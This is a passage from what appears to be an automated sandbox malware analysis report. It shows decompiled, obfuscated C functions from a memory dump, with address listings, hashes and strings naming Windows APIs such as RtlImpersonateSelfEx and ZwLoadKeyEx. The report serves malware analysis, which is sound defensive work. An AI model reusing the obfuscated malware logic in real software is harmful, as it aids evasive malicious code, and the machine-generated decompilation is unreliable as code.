                                                          0x004eb81d
                                                          0x004eb821
                                                          0x004eb82b
                                                          0x004eb830
                                                          0x004eb83b
                                                          0x004eb84a
                                                          0x004eb850
                                                          0x004eb859
                                                          0x004eb862
                                                          0x004eb86e
                                                          0x004eb875
                                                          0x004eb87f
                                                          0x004eb881
                                                          0x004eb881
                                                          0x004eb87f
                                                          0x004eb889
                                                          0x004eb89f
                                                          0x004eb8a3
                                                          0x004eb8aa
                                                          0x004eb8aa
                                                          0x004eb8ba
                                                          0x004eb8c4
                                                          0x004eb8d1
                                                          0x004eb8d6
                                                          0x004eb8f7
                                                          0x004eb8fe
                                                          0x004eb90b
                                                          0x004eb93c
                                                          0x004eb942
                                                          0x00000000
                                                          0x004eb90f
                                                          0x004eb911
                                                          0x004eb926
                                                          0x004eb926
                                                          0x004eb936
                                                          0x00000000
                                                          0x004eb936
                                                          0x004eb91a
                                                          0x004eb947
                                                          0x004eb957
                                                          0x004eb95c
                                                          0x004eb961
                                                          0x004eb961
                                                          0x00000000
                                                          0x004eb91f
                                                          0x004eb90b
                                                          0x004eb7ce
                                                          0x004eb7d0
                                                          0x004eb7d8
                                                          0x004eb7e0
                                                          0x004eb7f7
                                                          0x00000000
                                                          0x004eb7f9
                                                          0x004eb7fc
                                                          0x004eb803
                                                          0x00000000
                                                          0x004eb803

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AP6$RtlEthernetStringToAddressW$WindowsCodecs.dll$an,$credssp.dll$lprmonui.dll
                                                          • API String ID: 0-1858886497
                                                          • Opcode ID: d2f59f9fe6be3f744e39c27d75ebb10054f1b53990ae894ba509663b7daa92ef
                                                          • Instruction ID: bd803e6ab46253a478beaf4726cbe8730666319346302f184f56f664dc960ac5
                                                          • Opcode Fuzzy Hash: d2f59f9fe6be3f744e39c27d75ebb10054f1b53990ae894ba509663b7daa92ef
                                                          • Instruction Fuzzy Hash: 1641EF79B107468FCB00EF79E8A4ADD7BB0FF39320B08416AC884D7716E2350989E785
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004EDAAF Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 70%
                                                          			E004EDAAF(void* __ebx, void* __ecx, signed short __edx, signed int __edi, unsigned short __esi, void* __eflags) {
				intOrPtr _t26;
				char _t27;
				intOrPtr _t32;
				char _t33;
				intOrPtr _t35;
				intOrPtr* _t43;
				char _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				char _t47;
				intOrPtr _t48;
				intOrPtr _t64;
				void* _t78;
				intOrPtr _t79;
				signed short _t85;
				void* _t92;
				void* _t96;
				short _t101;
				intOrPtr* _t103;
				intOrPtr _t104;
				signed int _t107;
				unsigned short _t110;
				signed short _t115;
				void* _t116;

				_t110 = __esi;
				_t107 = __edi;
				_t85 = __edx;
				_t78 = __ecx;
				E004B6988(__ebx, __edx, __edi, __esi, __eflags, 1);
				_t26 =  *((intOrPtr*)(_t116 - 8));
				if( *((intOrPtr*)(_t116 - 0x18)) <= 0) {
					_push(_t85);
					 *0x5081c4 = _t85;
					_push(_t26);
					__eflags = _t26 - 0xad2d8;
					if(_t26 == 0xad2d8) {
						L16:
						 *0x50824c =  *0x50824c + _t110;
						_t110 = _t110 + _t110;
						_t27 =  *0x50afe3; // -68
						__eflags = _t110;
						if(_t110 >= 0) {
							 *0x50afe5 = _t27;
						}
						_t79 =  *0x508168; // 0xea80
						_t78 = _t79 - 0x7c8a;
						 *0x5081d2 = 0xa1df;
						__eflags = 0x9f;
						if(0x9f != 0) {
							 *0x508252 =  *0x508252 + _t110;
							__eflags =  *0x508252;
							goto L20;
						}
					} else {
						__eflags = "psxdllsvr.dll" - _t78;
						if("psxdllsvr.dll" < _t78) {
							 *0x5096c3 =  *0x5096c3 - 0x7290;
							__eflags =  *0x5096c3;
							 *0x5081cc = _t85;
							goto L16;
						}
					}
					__eflags = _t107;
					if(_t107 == 0) {
						 *0x50afe6 = 0xdf;
						__eflags = 0xdf;
					}
					_pop(_t87);
					_push(0);
					 *0x50822c =  *0x50822c + _t110;
					_pop(_t32);
					__eflags = _t107;
					if(_t107 < 0) {
						__eflags = 3 >> 0x7ea1;
					}
					 *((intOrPtr*)(_t116 - 8)) = _t32;
					 *0x50afe0 =  *0x50afe0 + 0x50af2f;
					__eflags = 0xa15e5e;
					_pop(_t92);
					_t33 =  *((intOrPtr*)(_t116 - 8));
					 *((char*)(_t116 - 0x19)) = _t33;
					 *0x50afe5 = _t33;
					 *0x50afe0 =  *0x50afe0 - 0x902b;
					 *0x50afe3 = _t33;
					 *((intOrPtr*)(_t116 - 8)) = _t33;
					_t35 =  *0x50afe3; // -68
					_t96 = _t92;
					_push(_t96);
					 *0x50998f =  *0x50998f - 0x8dc9;
					 *0x50828a =  *0x50828a - 0x50afe2;
					__eflags = 0xa15fc4;
					_push(1);
					_push(1);
					_push(0);
					_push(0x4edfae);
					_push(L004DAD9C);
					return _t35;
				} else {
					_t64 =  *0x5089b3; // 0x2304
					 *0x50afda =  *0x50afda - _t64;
					_push(_t26);
					_t115 = _t110 + 0xe0a3;
					_t43 =  *((intOrPtr*)(_t116 - 0x10));
					if((_t85 & 0x00785d17) < 0) {
						L5:
						 *0x50870b =  *0x50870b + _t107;
						 *0x5084b3 = _t43;
						goto L6;
					} else {
						if((_t85 & 0x00009ddb) < 0) {
							L9:
							 *0x508c63 = _t64;
						} else {
							 *0x50afe3 =  *0x50afe3 + 0xf4;
							if((__edi & _t115) >= 0) {
								if(__edi > 0) {
									goto L5;
								}
								L6:
								 *0x5086ab =  *0x5086ab + _t107;
								_t107 = 0xffffffffff22c38c;
							}
							if(_t43 < 0xb2f) {
								_t64 =  *0x5087c3 + 1;
								goto L9;
							}
						}
					}
					_t44 =  *_t43;
					if(_t78 >= _t78) {
						_t78 = _t78 + 1;
						_t85 =  *0x5081fe; // 0xd63d
					}
					 *0x50afe1 = _t44;
					 *((intOrPtr*)(_t116 - 8)) = _t44;
					_t45 =  *((intOrPtr*)(_t116 - 8));
					 *0x508693 = _t45;
					 *((intOrPtr*)(_t116 - 8)) = _t45;
					_t46 =  *((intOrPtr*)(_t116 - 8));
					_t101 =  *((intOrPtr*)(_t116 - 0x14));
					 *0x508ccf = 0x301467;
					 *0x5081ea = _t101;
					 *0x50afe3 = _t46;
					_t103 = _t101;
					_t104 =  *_t103;
					_t47 = _t46 - _t104;
					 *0x50afe3 = _t47;
					_push(_t104);
					 *0x50afe1 = _t47;
					_push(_t47);
					_t48 =  *0x50afe3; // -68
					_push(1);
					_push(0x4edbd5);
					_push(E004AE02F);
					return _t48;
				}
			}



























                                                          0x004edaaf
                                                          0x004edaaf
                                                          0x004edaaf
                                                          0x004edaaf
                                                          0x004edab3
                                                          0x004edaba
                                                          0x004edac1
                                                          0x004ede44
                                                          0x004ede45
                                                          0x004ede4c
                                                          0x004ede4d
                                                          0x004ede52
                                                          0x004ede85
                                                          0x004ede89
                                                          0x004ede90
                                                          0x004ede93
                                                          0x004ede99
                                                          0x004ede9c
                                                          0x004ede9e
                                                          0x004ede9e
                                                          0x004edea5
                                                          0x004edeac
                                                          0x004edeb1
                                                          0x004edeb8
                                                          0x004edebb
                                                          0x004edec0
                                                          0x004edec0
                                                          0x00000000
                                                          0x004edec0
                                                          0x004ede54
                                                          0x004ede66
                                                          0x004ede68
                                                          0x004ede75
                                                          0x004ede75
                                                          0x004ede7b
                                                          0x00000000
                                                          0x004ede7b
                                                          0x004ede68
                                                          0x004eded1
                                                          0x004eded4
                                                          0x004eded6
                                                          0x004ededb
                                                          0x004edee5
                                                          0x004edef2
                                                          0x004edf07
                                                          0x004edf08
                                                          0x004edf0f
                                                          0x004edf18
                                                          0x004edf1b
                                                          0x004edf21
                                                          0x004edf21
                                                          0x004edf2c
                                                          0x004edf2f
                                                          0x004edf35
                                                          0x004edf37
                                                          0x004edf38
                                                          0x004edf3b
                                                          0x004edf46
                                                          0x004edf52
                                                          0x004edf5c
                                                          0x004edf67
                                                          0x004edf79
                                                          0x004edf7f
                                                          0x004edf82
                                                          0x004edf87
                                                          0x004edf94
                                                          0x004edf9b
                                                          0x004edf9d
                                                          0x004edf9f
                                                          0x004edfa1
                                                          0x004edfa3
                                                          0x004edfa8
                                                          0x004edfad
                                                          0x004edac7
                                                          0x004edac7
                                                          0x004edacd
                                                          0x004edad3
                                                          0x004edad4
                                                          0x004edada
                                                          0x004edae3
                                                          0x004edb01
                                                          0x004edb01
                                                          0x004edb08
                                                          0x00000000
                                                          0x004edae5
                                                          0x004edaea
                                                          0x004edb31
                                                          0x004edb31
                                                          0x004edaef
                                                          0x004edaf2
                                                          0x004edafb
                                                          0x004edaff
                                                          0x00000000
                                                          0x00000000
                                                          0x004edb0f
                                                          0x004edb14
                                                          0x004edb1e
                                                          0x004edb1e
                                                          0x004edb28
                                                          0x004edb30
                                                          0x00000000
                                                          0x004edb30
                                                          0x004edb28
                                                          0x004edaea
                                                          0x004edb3f
                                                          0x004edb43
                                                          0x004edb46
                                                          0x004edb4b
                                                          0x004edb4b
                                                          0x004edb52
                                                          0x004edb60
                                                          0x004edb64
                                                          0x004edb67
                                                          0x004edb73
                                                          0x004edb79
                                                          0x004edb7c
                                                          0x004edb7f
                                                          0x004edb86
                                                          0x004edb95
                                                          0x004edba0
                                                          0x004edba1
                                                          0x004edba3
                                                          0x004edba7
                                                          0x004edbad
                                                          0x004edbbb
                                                          0x004edbc1
                                                          0x004edbc2
                                                          0x004edbc8
                                                          0x004edbca
                                                          0x004edbcf
                                                          0x004edbd4
                                                          0x004edbd4

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: B5d$RtlImpersonateSelfEx$ZwLoadKeyEx$psxdllsvr.dll$wmi.dll
                                                          • API String ID: 0-3038952217
                                                          • Opcode ID: 3b71fb290dd3361d19df329fee83dd1267edef187d353b52f1eb0fb0144e4fda
                                                          • Instruction ID: 7830e6be52c85e6e4af44c14103da85aa597430e954a9a9d13c1eb4e04d3e9b1
                                                          • Opcode Fuzzy Hash: 3b71fb290dd3361d19df329fee83dd1267edef187d353b52f1eb0fb0144e4fda
                                                          • Instruction Fuzzy Hash: 0A512B69A44782CFC700CF7AEC44FDD3FB2EB79710B08526AD8949B3A6E6750409E715
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004BF25C Relevance: 6.4, Strings: 5, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E004BF25C(signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				char* _v12;
				intOrPtr _t9;
				char* _t10;
				char _t18;
				intOrPtr _t23;
				char _t30;
				char* _t39;
				signed char _t56;
				void* _t62;

				_t56 = __edx;
				_t48 = __ecx;
				if((__edx & 0x00000088) != 0) {
					L10:
					 *0x50822e = _t56;
					goto L11;
				} else {
					_t23 = _t9;
					 *0x50afe5 = _t23;
					 *0x50afe5 = _t23;
					 *0x508034 =  *0x508034 + "CreateMutexW";
					_t29 = 0x2844;
					_t39 = ("GetTickCount64" & 0x00000051) + 0x59;
					 *0x508170 = __ecx + 1;
					_t48 =  *0x5081a6; // 0xbee4
					 *0x509ad7 =  *0x509ad7 + 0x96a5;
					_t62 = 0x12d4a;
					if(0 == 0) {
						L5:
						_t48 = (_t48 & 0x005d9e50) + 0x7045;
						 *0x50afdf =  *0x50afdf + _t62;
						goto L6;
					} else {
						 *0x50afe3 = 0x2844;
						 *0x50870d =  *0x50870d - __edi;
						_t29 = 0xfd578;
						if(0 != 0x1989) {
							L6:
							_t56 = _t62 + _t62;
							if((_t56 & 0x0000009a) < 0) {
								L11:
								_t10 =  *0x50afe1; // -128
								 *0x50afe3 = _t10 - 0xc3;
								_v12 = _t39;
								 *0x50afdd =  *0x50afdd - _t48;
								 *0x508144 = _t48;
								 *0x5097df =  *0x5097df - _t56;
							} else {
								_t56 = 0xa775;
								 *0x50afe1 = _t29;
								_t30 =  *0x50afe3; // -68
								 *0x50afe6 = _t30;
								 *0x50afd8 =  *0x50afd8 - _t30 + _t30 + 0x9b315;
								_t39 = 0x3b32e4;
								if(0x3b32e4 == 0x3b32e4) {
									_t48 = 0x6b;
									 *0x50afde =  *0x50afde - 0x6b;
									 *0x508194 = 0;
									_t62 = 0;
									goto L9;
								}
							}
						} else {
							_t29 = "lyncicon.exe";
							if(_t39 >= 0x3a) {
								L9:
								_t56 = _t62 - 1;
								goto L10;
							} else {
								_t39 = "api-ms-win-core-sysinfo-l1-1-0.dll";
								goto L5;
							}
						}
					}
				}
				 *0x5081e4 = _t56;
				 *0x50afe3 =  *0x50afe3 - 0xbc;
				_t18 =  *0x50afe3; // -68
				 *0x50afe5 =  *0x50afe5 + _t18;
				 *0x50afe6 = _t18;
				 *0x50805a =  *0x50805a + 0x12a515;
				return 0;
			}












                                                          0x004bf25c
                                                          0x004bf25c
                                                          0x004bf265
                                                          0x004bf37e
                                                          0x004bf37e
                                                          0x00000000
                                                          0x004bf26e
                                                          0x004bf272
                                                          0x004bf27a
                                                          0x004bf27f
                                                          0x004bf291
                                                          0x004bf29e
                                                          0x004bf2a7
                                                          0x004bf2ab
                                                          0x004bf2b5
                                                          0x004bf2c5
                                                          0x004bf2cb
                                                          0x004bf2d3
                                                          0x004bf310
                                                          0x004bf31b
                                                          0x004bf31c
                                                          0x00000000
                                                          0x004bf2d5
                                                          0x004bf2d5
                                                          0x004bf2e5
                                                          0x004bf2ef
                                                          0x004bf2f8
                                                          0x004bf322
                                                          0x004bf322
                                                          0x004bf327
                                                          0x004bf385
                                                          0x004bf385
                                                          0x004bf38e
                                                          0x004bf3ac
                                                          0x004bf3b8
                                                          0x004bf3be
                                                          0x004bf3cd
                                                          0x004bf329
                                                          0x004bf329
                                                          0x004bf32d
                                                          0x004bf337
                                                          0x004bf33d
                                                          0x004bf34c
                                                          0x004bf35d
                                                          0x004bf364
                                                          0x004bf36b
                                                          0x004bf36e
                                                          0x004bf374
                                                          0x004bf37b
                                                          0x00000000
                                                          0x004bf37b
                                                          0x004bf364
                                                          0x004bf2fa
                                                          0x004bf2fa
                                                          0x004bf302
                                                          0x004bf37d
                                                          0x004bf37d
                                                          0x00000000
                                                          0x004bf304
                                                          0x004bf30b
                                                          0x00000000
                                                          0x004bf30b
                                                          0x004bf302
                                                          0x004bf2f8
                                                          0x004bf2d3
                                                          0x004bf3d3
                                                          0x004bf3e9
                                                          0x004bf3f1
                                                          0x004bf3f7
                                                          0x004bf3fd
                                                          0x004bf40f
                                                          0x004bf419

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CreateMutexW$GetTickCount64$api-ms-win-core-sysinfo-l1-1-0.dll$lyncicon.exe$2;
                                                          • API String ID: 0-164973337
                                                          • Opcode ID: 2beaa060368e406c5337ea5664c7da24f5cfdc5351bcd975c915a6668df5af08
                                                          • Instruction ID: 9577fbc2603e87b21bec4ef7c0b25157a06e457f31bd73c22798c8569fcc6440
                                                          • Opcode Fuzzy Hash: 2beaa060368e406c5337ea5664c7da24f5cfdc5351bcd975c915a6668df5af08
                                                          • Instruction Fuzzy Hash: 7A41039E509B824FC701DF7CEC58ACD3FA1DB7A32070862AA8894877A7E124050EE717
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004F306A Relevance: 3.9, Strings: 3, Instructions: 191COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 71%
                                                          			E004F306A(short __ecx, unsigned short __edi) {
				void* _t25;
				char _t26;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t34;
				void* _t39;
				intOrPtr _t40;
				char _t45;
				short _t84;
				signed char _t93;
				signed short _t94;
				signed char _t102;
				signed int _t103;
				void* _t116;
				signed short _t119;
				void* _t128;

				_t112 = __edi;
				_pop(_t25);
				_pop(_t93);
				_t26 =  *((intOrPtr*)(_t25 + _t93 * 4));
				if(_t26 < 0x4eb92) {
					L5:
					 *((intOrPtr*)(_t128 - 8)) =  *((intOrPtr*)(_t128 - 8)) + 0x6d07;
					 *0x5081a0 = 0x6d07;
					_t84 = 0x6d07 - _t93;
					 *0x508220 = _t93;
					if((_t93 & 0x000000af) > 0) {
						if((_t119 & 0x0000bbdf) < 0) {
						}
						 *0x50aa22 =  *0x50aa22 + _t112;
					}
					L9:
					 *0x50b010 =  *0x50b010 - _t112;
					 *0x50afd8 =  *0x50afd8 + _t26;
					_t94 =  *(_t128 - 0x40);
					if(_t119 != 0) {
						L12:
						 *0x5084cf =  *0x5084cf + _t26;
						L13:
						if(_t84 >= _t84) {
							E00508174 = _t84;
							 *0x5081f4 = _t94;
							 *0x50afe3 =  *0x50afe3 - _t26;
							_t119 = 0x215102;
							_t112 = 0x50abd0;
							 *0x50afe6 = _t26;
							 *0x50806c =  *0x50806c - _t26;
						}
						 *__edx = _t26;
						if((_t94 & 0x00008af3) == 0) {
							 *0x509dbf =  *0x509dbf - 0xaa7d;
							_t119 = 0xd1e9;
						}
						_push(_t94);
						_push(_t26);
						_t28 =  *((intOrPtr*)(_t128 - 0x20));
						_t116 = ((_t112 >> 1) + 1 >> 1) - 1;
						_push( *((intOrPtr*)(_t128 - 0x28)));
						 *((intOrPtr*)(_t128 - 8)) = _t28;
						 *0x50afe3 = _t28;
						 *0x508707 =  *0x508707 + _t116;
						_pop(_t102);
						_push(_t102);
						if((_t102 & 0x00000088) == 0) {
							 *0x50afe1 = 0xef;
							_t40 =  *0x50afe3; // -68
							 *0x50afe5 = _t40 - 0xd0;
							if(_t116 >= 0) {
								_t116 = _t116 + 1;
							}
						}
						_t31 =  *((intOrPtr*)(_t128 - 8));
						 *0x50afe3 =  *0x50afe3 + _t31;
						_t34 = _t31;
						 *((intOrPtr*)(_t128 - 0xc)) = _t34;
						_pop(_t103);
						 *0x509b0f =  *0x509b0f - _t103;
						_push(_t103);
						 *0x5081e2 = _t103;
						_push( *((intOrPtr*)( *((intOrPtr*)(_t128 - 0xc)) + _t103 * 4)));
						_pop(_t39);
						if(_t116 + _t116 != 0) {
							L23:
							goto L24;
						} else {
							if(_t39 > 0x1013) {
								L25:
								_push( *(_t128 - 0x40));
								_push(_t39);
								_push(1);
								_push(E004F330A);
								_push(E004EC8A7);
								return _t39;
							}
							if("api-ms-win-core-rtlsupport-l1-1-0.dll" >= "api-ms-win-core-rtlsupport-l1-1-0.dll") {
								L24:
								 *0x508226 =  !0x8e3a;
								goto L25;
							}
							goto L23;
						}
					}
					 *0x50afe5 =  *0x50afe5 - _t26;
					 *0x50afe5 = _t26;
					if(_t112 >= 0) {
						goto L13;
					} else {
						_t112 = _t112 - 0x198cc;
						goto L12;
					}
				}
				 *0x50893f =  *0x50893f + _t26;
				 *0x508132 = __ecx;
				_t84 = 0x7bc0;
				 *0x5081d0 = _t93;
				_t119 = _t93 - 0x996b01;
				_t45 = _t26;
				if(_t119 <= 0) {
					L3:
					if(_t45 > _t45) {
						goto L9;
					}
					L4:
					goto L5;
				}
				_t112 = __edi + 0xda5d;
				 *0x50ac58 =  *0x50ac58 - _t112;
				 *0x508046 =  *0x508046 - _t26;
				 *0x50883f =  *0x50883f - _t26;
				_t45 = 0xd1ba6;
				if(0xd1ba6 != 0x36) {
					goto L4;
				}
				goto L3;
			}



















                                                          0x004f306a
                                                          0x004f306a
                                                          0x004f306b
                                                          0x004f306c
                                                          0x004f3074
                                                          0x004f30dd
                                                          0x004f30e1
                                                          0x004f30e4
                                                          0x004f30eb
                                                          0x004f30f1
                                                          0x004f30fb
                                                          0x004f3102
                                                          0x004f3102
                                                          0x004f3107
                                                          0x004f310d
                                                          0x004f310f
                                                          0x004f3115
                                                          0x004f311b
                                                          0x004f3123
                                                          0x004f3129
                                                          0x004f3141
                                                          0x004f3141
                                                          0x004f315c
                                                          0x004f315e
                                                          0x004f3160
                                                          0x004f316e
                                                          0x004f317f
                                                          0x004f3185
                                                          0x004f318d
                                                          0x004f3193
                                                          0x004f31a5
                                                          0x004f31a5
                                                          0x004f31af
                                                          0x004f31b9
                                                          0x004f31c9
                                                          0x004f31d3
                                                          0x004f31d8
                                                          0x004f31dd
                                                          0x004f31e1
                                                          0x004f31e8
                                                          0x004f31f9
                                                          0x004f31fc
                                                          0x004f3202
                                                          0x004f3211
                                                          0x004f321e
                                                          0x004f3225
                                                          0x004f3226
                                                          0x004f322a
                                                          0x004f3233
                                                          0x004f3239
                                                          0x004f3242
                                                          0x004f324a
                                                          0x004f324c
                                                          0x004f3257
                                                          0x004f324a
                                                          0x004f325c
                                                          0x004f3266
                                                          0x004f3275
                                                          0x004f3276
                                                          0x004f3281
                                                          0x004f3285
                                                          0x004f328b
                                                          0x004f328c
                                                          0x004f3298
                                                          0x004f329d
                                                          0x004f32a1
                                                          0x004f32c6
                                                          0x00000000
                                                          0x004f32a3
                                                          0x004f32ad
                                                          0x004f32dc
                                                          0x004f32f5
                                                          0x004f32fc
                                                          0x004f32fd
                                                          0x004f32ff
                                                          0x004f3304
                                                          0x004f3309
                                                          0x004f3309
                                                          0x004f32c4
                                                          0x004f32c9
                                                          0x004f32d5
                                                          0x00000000
                                                          0x004f32d5
                                                          0x00000000
                                                          0x004f32c4
                                                          0x004f32a1
                                                          0x004f312b
                                                          0x004f3131
                                                          0x004f3139
                                                          0x00000000
                                                          0x004f313b
                                                          0x004f313b
                                                          0x00000000
                                                          0x004f313b
                                                          0x004f3139
                                                          0x004f3076
                                                          0x004f3085
                                                          0x004f308e
                                                          0x004f3092
                                                          0x004f309e
                                                          0x004f30a4
                                                          0x004f30a8
                                                          0x004f30d7
                                                          0x004f30d9
                                                          0x00000000
                                                          0x00000000
                                                          0x004f30db
                                                          0x00000000
                                                          0x004f30db
                                                          0x004f30aa
                                                          0x004f30af
                                                          0x004f30c0
                                                          0x004f30c7
                                                          0x004f30cd
                                                          0x004f30d5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Strings
                                                          • tsbyuv.dll, xrefs: 004F324D
                                                          • api-ms-win-core-rtlsupport-l1-1-0.dll, xrefs: 004F32BC
                                                          • SystemPropertiesComputerName.exe, xrefs: 004F3154
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: SystemPropertiesComputerName.exe$api-ms-win-core-rtlsupport-l1-1-0.dll$tsbyuv.dll
                                                          • API String ID: 0-1828556471
                                                          • Opcode ID: 41869c88c3748de0dd35912a072f78c29baa79d2f9dcbfcb317a4b16e30960cc
                                                          • Instruction ID: 672a03499394964dd9861684983758713d79979eeecf5b4f69bd079bb5dbfc5e
                                                          • Opcode Fuzzy Hash: 41869c88c3748de0dd35912a072f78c29baa79d2f9dcbfcb317a4b16e30960cc
                                                          • Instruction Fuzzy Hash: 33613ABAA447458FC701CF79ED54AEE3BF1EF7A720704526AC980973A2E7240909E745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004BEACF Relevance: 3.9, Strings: 3, Instructions: 142COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E004BEACF(signed char __eax, void* __ebx, signed char __ecx, signed int __edi, void* __esi) {
				signed char _t32;
				char _t33;
				signed char _t34;
				signed char _t36;
				void* _t40;
				signed char _t41;
				signed char _t42;
				signed char _t48;
				void* _t49;
				intOrPtr _t55;
				char* _t69;
				char* _t70;
				signed char _t73;
				signed int _t78;
				intOrPtr _t79;
				signed short _t89;
				signed int _t92;
				signed int _t94;
				void* _t95;
				signed short _t98;
				void* _t100;

				_t95 = __esi;
				_t92 = __edi;
				_t73 = __ecx;
				_t32 = __eax;
				if(_t32 == 0) {
					return _t32;
				} else {
					if(__ebx == __ecx) {
					}
					_t79 =  *0x5081c4; // 0x3542
					 *0x50820e =  *0x50820e - _t79 - 0x979d;
					_t98 = _t95 + 0xa44419 >> _t73;
					 *(_t100 - 0x20) = _t32;
					 *(_t100 - 8) = _t32;
					if(0x994 != 0) {
						L6:
						_t33 = _t32 - 0xe8;
						 *0x50afd8 = _t33;
						if(_t33 < 0x10) {
							 *0x50899b =  *0x50899b + _t33 + 0x1c7017;
						}
						 *0x50811c =  *0x50811c + _t73;
					} else {
						if(0x94 == 0) {
							_t32 = 0xbf;
							 *0x50a7a5 =  *0x50a7a5 + _t98;
							 *0x50afe5 = 0xbf;
							goto L6;
						}
					}
					 *0x5081d6 = 0xffffffffff883c40;
					_t34 =  *(_t100 - 8);
					_push(0);
					 *0x5081d6 = 0xffffffffff87b69e;
					if(0x42114 >= 0) {
						 *0x50afe3 = _t34;
					}
					_t55 =  *0x50afe5; // -1
					 *0x5086d7 =  *0x5086d7 - _t92;
					 *0x5086f3 =  *0x5086f3 + _t92;
					 *(_t100 - 8) = _t34;
					E004B310A(_t34, 0, _t98);
					_t36 =  *(_t100 - 8);
					_push(1);
					 *0x50afdc =  *0x50afdc - _t55 + _t34 - _t36 + 0x30ebcb;
					_t78 = 0 << 0;
					_push( *((intOrPtr*)(_t100 - 0x14)));
					_t94 =  !_t92;
					_t40 = _t36;
					 *0x50998b =  *0x50998b - 0x8da8;
					 *0x508208 = 0x8da8;
					if((_t98 & 0x0000b514) >= 0) {
					}
					if(_t40 < 0) {
						 *0x50add4 =  *0x50add4 + _t94;
					}
					 *0x50888b =  *0x50888b - _t40;
					 *0x50afd9 =  *0x50afd9 + _t40;
					 *(_t100 - 8) = _t78;
					_t41 =  *(_t100 - 0x20)();
					 *0x50820e =  *0x50820e + 0xffffffffffffe076;
					 *(_t100 - 8) = _t41;
					if((_t78 & 0x00714d43) <= 0) {
						 *0x5081d6 = 0xffffffffffffe076;
					}
					_t89 = 0xffffffffffffe11e;
					_t42 =  *(_t100 - 8);
					 *0x50889b = _t42;
					_t69 = "ZwLoadKeyEx";
					 *(_t100 - 8) = _t42;
					if(2 > 0) {
						_t42 = _t42 + _t42;
					}
					E004A8660(_t69, _t78, _t98);
					_t70 = _t69;
					if((_t89 & 0x000093c4) != 0) {
						 *0x50afe0 =  *0x50afe0 + _t89;
					}
					E004AF4C5(L00466DA9(_t70, _t94, _t98 + _t98, _t98 + _t98, 1), _t70, _t89, _t94, _t98 + _t98);
					_t48 =  *(_t100 - 8);
					_push(_t48);
					if((_t48 & _t48) != 0) {
						 *0x50afe6 = _t48;
					}
					_pop(_t49);
					_push(_t49);
					_push(1);
					_push(0);
					_push(_t49);
					_push(0x4becd4);
					_push(E004BE12C);
					return _t49;
				}
			}
























                                                          0x004beacf
                                                          0x004beacf
                                                          0x004beacf
                                                          0x004beacf
                                                          0x004bead1
                                                          0x004becdc
                                                          0x004bead9
                                                          0x004beadc
                                                          0x004beadc
                                                          0x004beae1
                                                          0x004beaed
                                                          0x004beafe
                                                          0x004beb01
                                                          0x004beb08
                                                          0x004beb11
                                                          0x004beb28
                                                          0x004beb28
                                                          0x004beb2b
                                                          0x004beb32
                                                          0x004beb39
                                                          0x004beb39
                                                          0x004beb48
                                                          0x004beb13
                                                          0x004beb16
                                                          0x004beb1b
                                                          0x004beb1d
                                                          0x004beb23
                                                          0x00000000
                                                          0x004beb23
                                                          0x004beb16
                                                          0x004beb5e
                                                          0x004beb68
                                                          0x004beb6b
                                                          0x004beb77
                                                          0x004beb87
                                                          0x004beb89
                                                          0x004beb89
                                                          0x004beb95
                                                          0x004beb9b
                                                          0x004beba2
                                                          0x004bebab
                                                          0x004bebb1
                                                          0x004bebb6
                                                          0x004bebb9
                                                          0x004bebc4
                                                          0x004bebca
                                                          0x004bebcd
                                                          0x004bebe0
                                                          0x004bebf7
                                                          0x004bebfc
                                                          0x004bec02
                                                          0x004bec13
                                                          0x004bec13
                                                          0x004bec19
                                                          0x004bec1b
                                                          0x004bec1b
                                                          0x004bec2f
                                                          0x004bec35
                                                          0x004bec45
                                                          0x004bec48
                                                          0x004bec4b
                                                          0x004bec52
                                                          0x004bec5b
                                                          0x004bec5d
                                                          0x004bec5d
                                                          0x004bec64
                                                          0x004bec67
                                                          0x004bec6f
                                                          0x004bec74
                                                          0x004bec76
                                                          0x004bec7c
                                                          0x004bec7e
                                                          0x004bec7e
                                                          0x004bec82
                                                          0x004bec8a
                                                          0x004bec94
                                                          0x004bec96
                                                          0x004bec96
                                                          0x004beca7
                                                          0x004becac
                                                          0x004becb1
                                                          0x004becb4
                                                          0x004becb6
                                                          0x004becb6
                                                          0x004becbb
                                                          0x004becc3
                                                          0x004becc4
                                                          0x004becc6
                                                          0x004becc8
                                                          0x004becc9
                                                          0x004becce
                                                          0x004becd3
                                                          0x004becd3

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
